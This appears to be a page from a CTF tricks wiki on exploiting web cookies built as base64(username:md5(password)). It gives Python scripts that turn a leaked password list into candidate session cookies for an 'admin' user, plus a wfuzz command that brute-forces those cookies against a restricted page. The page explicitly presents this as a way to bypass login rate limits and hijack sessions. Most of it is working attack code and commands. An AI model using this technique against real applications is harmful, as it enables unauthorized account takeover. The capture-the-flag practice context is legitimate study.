> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/cookie-manipulation/session-hijacking/trick-0170.md).

# Web Cookie Format Exploitation

***

When a web application uses a predictable cookie format like `base64(username:md5(password))`, you can leverage leaked password lists to generate potential session cookies for a target user (e.g., `admin`).

Use a script to iterate through the password list, compute the MD5 hash for each password, format it with the target username, and Base64 encode the result:

```python
import hashlib, base64

# Assume the target username is 'admin' and format is base64(username:md5(password))
target_username = 'admin'
password_list_file = 'passwords_list.txt'
output_file = 'generated_cookie_list' # File to save generated cookies

with open(password_list_file, 'r') as f_in, open(output_file, 'w') as f_out:
    for line in f_in:
        stripped_password = line.strip() # Use strip to remove leading/trailing whitespace/newlines
        # Consider character filtering if needed, based on observation
        # stripped_password = ''.join(filter(str.isalnum, stripped_password)) # Example filter

        hashed_password = hashlib.md5(stripped_password.encode('utf-8')).hexdigest()
        formatted_string = f'{target_username}:{hashed_password}' # Use f-string for clarity

        encoded_string = base64.b64encode(formatted_string.encode('utf-8'))
        f_out.write(encoded_string.decode('ascii') + '\n')

print(f"Generated potential cookies in {output_file}")
```

Alternatively, the logic can be structured using functions for clarity and reusability. One approach is to define functions for hashing the password and generating the cookie string.

Here is an example of functions to perform the hashing and encoding steps:

```python
import hashlib
import base64

def hash_password(password):
    """Hashes the password using MD5."""
    hashed_password = hashlib.md5(password.encode()).hexdigest()
    return hashed_password

def generate_cookie(username, password):
    """Generates the predictable cookie string."""
    hashed_password = hash_password(password)
    cookie_value = f"{username}:{hashed_password}"
    encoded_cookie = base64.b64encode(cookie_value.encode()).decode()
    return encoded_cookie
```

These functions can then be used within a loop to process a list of potential passwords for a target username:

```python
username = "admin" # Replace with the target username
passwords = ["password1", "password2", "password3"] # Replace with your password list or load from file

for password in passwords:
    cookie = generate_cookie(username, password)
    print(f"Generated cookie for {username}:{password}: {cookie}")
    # In a real script, you would write 'cookie' to a file here
```

Then, use `wfuzz` to test these generated cookies against a restricted page (like `/administration.php`), identifying valid cookies by a unique HTTP response size or other indicator:

```bash
wfuzz -u http://<target_ip>/administration.php -w generated_cookie_list -X GET -b 'PHPSESSID=FUZZ' --hh 51
```

This method bypasses rate limits on login forms and directly attempts session hijacking based on the known format. Adjust the HTTP method (`-X GET`/`-X POST`), the cookie name (`PHPSESSID`), and the filter (`--hh 51`) based on the target application's specifics.
